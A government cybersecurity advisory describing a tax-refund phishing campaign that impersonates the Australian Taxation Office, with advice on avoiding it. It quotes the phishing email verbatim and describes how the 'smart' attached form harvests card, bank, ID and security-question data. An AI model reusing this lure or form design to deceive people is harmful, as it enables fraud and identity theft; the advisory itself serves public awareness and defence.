We all know the saying: ‘Nothing is certain but death and taxes’. But in the online world, there’s a new certainty—tax-related phishing campaigns will ramp up around tax return time. We’re already starting to see this year’s crop in the spam reports we receive from members of the Australian public.
Some of these phishing campaigns are very sophisticated, and one particularly complex campaign is currently doing the rounds. Dubbed the ‘financial institutions smart phish’ campaign, it’s so-called because the ‘phish’ can dynamically adapt its content to request customer credentials for almost every financial institution currently operating in Australia.
How does the phish work?
The phish is delivered through a spam email with an attached HTML file. The email text encourages the recipient to open the file, as in the below example:
After the last calculation of your fiscal activity, we have determined that you are eligible to receive a refund of $699.64
In order to receive your tax refund, please follow next steps:
- Save the attached form on your PC and open it in a web browser (e.g. Chrome, Safari or Firefox). If you can’t save the attached form, please use a different browser.
- Once opened, you will be provided with the steps to complete your tax refund application form.
- Complete the attached form accurately to avoid delays in processing your application.
We will refund your tax within 30 days after you submit the form.
Tax Refund Department
Australian Taxation Office
If you open the attachment, an ‘Australian Taxation Office – Refund Form’ (see below) appears requesting relatively general personal information. Unlike many phishing campaigns, the form is professionally presented, with clear English expression.
As you complete the data in the form, it dynamically changes. For example, a field appears requesting ‘Card Type’ information. Depending on what card information you enter, different fields will appear in the form, such as the name of the financial institution the card belongs to and additional relevant information.
The form will request additional personal information—such as your drivers licence, Medicare or passport number. If you choose the ‘drivers licence’ option, the details in the form field will change to reflect which state/territory your licence relates to. A default security question response will also be requested, such as ‘Mother’s Maiden Name’ and ‘Pet’s Name’.
This ‘smart’ form can even identify incorrectly entered information, such as an invalid credit card number or too many/too few alpha or numeric characters. ‘Help’ fields also appear to assist data entry. All of these features help to make the form look legitimate.
How can I avoid being scammed?
Below is an example of an almost completed form with expanded fields that include sensitive and extensive personal identity information. If you provided this information, the criminals behind the phishing campaign may have sufficient detail to impersonate you and potentially use it to try to access your financial accounts.
This phishing campaign seems to have a strategy of using a sophisticated form to dupe internet users into a false sense of security. For example:
- The form field information includes the details of current Australian financial institutions.
- Many items requested in the form will be familiar to users accustomed to online accounts such as PayPal.
- It appears that, rather than send large numbers of spam emails with the attachment, the spam ‘runs’ are fairly small in number. Presumably, this is to reduce the prospects of the spam being detected by network spam filtering devices.
Our advice on how to avoid these scams is simple—never open forms attached to emails. No reputable organisation will ask you for information in this way.
You should also use two-factor authentication on your accounts where this is available. If your username and password are exposed, you’ll still be protected by the other ‘factor’.
Check out the Stay Smart Online website for further tips on how to avoid having your personal information exposed to a phishing campaign.
Subscribe to the ACMA’s Cybersecurity news for the latest cybersecurity trends and updates from the Australian Internet Security Initiative, with a focus on malware and botnet activities.